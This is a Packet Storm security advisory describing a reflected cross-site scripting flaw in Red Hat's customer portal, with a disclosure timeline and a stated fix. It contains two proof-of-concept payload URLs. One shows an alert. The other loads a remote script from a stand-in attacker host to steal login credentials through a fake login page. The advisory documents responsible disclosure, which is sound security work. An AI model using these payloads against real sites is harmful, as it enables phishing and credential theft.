what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

access.redhat.com Cross Site Scripting

access.redhat.com Cross Site Scripting
Posted May 2, 2016
Authored by Yann CAM

access.redhat.com suffered from a cross site scripting vulnerability.

tags | exploit, xss
systems | linux, redhat
SHA-256 | 96ad56fe26f9c2e147c24cf7b7252f6f7db7be5f8055546b074f93638fcc666a

access.redhat.com Cross Site Scripting

Change Mirror Download
######################################################################
# Exploit Title: access.redhat.com Reflected XSS Credential stealer
# Date: 01/05/2016
# Author: Yann CAM @ Synetis - ASafety
# Vendor or Software Link: www.redhat.com
# Version: /
# Category: Reflected Cross Site Scripting
# Google dork:
# Tested on: RedHat access sub-domain
######################################################################

RedHat description :
======================================================================

Red Hat, Inc. is an American multinational software company providing open-source software products to the enterprise community. Founded in 1993, Red Hat
has its corporate headquarters in Raleigh, North Carolina, with satellite offices worldwide.

Red Hat has become associated to a large extent with its enterprise operating system Red Hat Enterprise Linux and with the acquisition of open-source
enterprise middleware vendor JBoss. Red Hat also offers Red Hat Enterprise Virtualization (RHEV), an enterprise virtualization product. Red Hat provides
storage, operating system platforms, middleware, applications, management products, and support, training, and consulting services.

Red Hat creates, maintains, and contributes to many free software projects. It has acquired several proprietary software product codebases through corporate
mergers and acquisitions and has released such software under open source licenses. As of June 2013, Red Hat is the largest corporate contributor to Linux.


Vulnerability description :
======================================================================
A reflected Cross-Site Scripting vulnerability was identified in the Customer portal "access.redhat.com" without authentication.

Through this vulnerability, an attacker could tamper with page rendering, redirect victims to fake redhat portals, or capture RedHat's customer credentials.
This vulnerable parameter is not properly sanitized before being used in pages.

As demonstration, the RXSS vulnerability is used to create a fake login page identical to the official RedHat Identity Provider (idp.redhat.com) to steal user credential through phishing or spear-phishing campains.


Proof of Concept 1 - access.redhat.com - RXSS alert() canonical :
======================================================================

A non-persistent XSS (RXSS) in "uri" GET param is available in the access.redhat.com of RedHat.
Tested on Firefox 45.0.2.

PoC:

https://access.redhat.com/downloads/content/error?code=403&uri=</mark><img src=x onerror="alert(/Yann CAM - Security Consultant @ASafety - SYNETIS/)" /><mark>&client=13.37.13.37&edge=13.37.13.37&timestamp=1446643590


Proof of Concept 2 - access.redhat.com - RXSS third party script :
======================================================================

Through this XSS, a malicious user can load a third-party JavaScript file in the access.redhat.com browser's context.
The next payload includes a JavaScript file in the access.redhat.com context to grab all credential in plaintext.
Tested on Firefox 45.0.2.

PoC:

https://access.redhat.com/downloads/content/error?code=403&uri=</mark><img src=x onerror="var s%3Ddocument.createElement('script')%3Bs.setAttribute('src','https://attacker.com/x.js')%3Bdocument.getElementsByTagName('head').item(0).appendChild(s)%3B" /><mark>&client=13.37.13.37&edge=13.37.13.37&timestamp=1446643590


Demonstration video :
======================================================================

- https://www.youtube.com/watch?v=Eb83GDEq9N8

Screenshots :
======================================================================

- https://www.asafety.fr/data/20151104-RXSS_access.redhat.com_001.png
- https://www.asafety.fr/data/20151104-RXSS_access.redhat.com_002.png


Solution:
======================================================================

Fixed by RedHat Security Team.


Additional resources :
======================================================================

- https://www.redhat.com/
- https://access.redhat.com/articles/66234
- http://www.asafety.fr/
- http://www.synetis.com


Report timeline :
======================================================================

2015-11-04 : RedHat Team alerted with details and PoC.
2015-11-09 : RedHat Team response with thanks.
2015-11-11 : RedHat Team requires some details about the exploitation.
2016-01-16 : New message to RedHat team to get the status of correction
2016-01-18 : Response : issue identified but not fixed yet.
2016-03-17 : Credential Stealer PoC video demonstration created.
2016-03-18 : RedHat Team response with thanks for the PoC, fix currently in testing.
2016-04-25 : Fix seems to be deployed, vulnerabily doesn't work anymore. New message to RedHat to confirm the fix.
2016-04-27 : Confirmation of the fix, aknowledgement released (https://access.redhat.com/articles/66234)
2016-05-01 : Public advisory


Credits :
======================================================================

88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security

Yann CAM - Security Consultant @ Synetis | ASafety

--
SYNETIS | ASafety
CONTACT: www.synetis.com | www.asafety.fr
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    3 Files
  • 8
    May 8th
    4 Files
  • 9
    May 9th
    54 Files
  • 10
    May 10th
    12 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    17 Files
  • 14
    May 14th
    11 Files
  • 15
    May 15th
    17 Files
  • 16
    May 16th
    13 Files
  • 17
    May 17th
    22 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    17 Files
  • 21
    May 21st
    18 Files
  • 22
    May 22nd
    7 Files
  • 23
    May 23rd
    111 Files
  • 24
    May 24th
    27 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close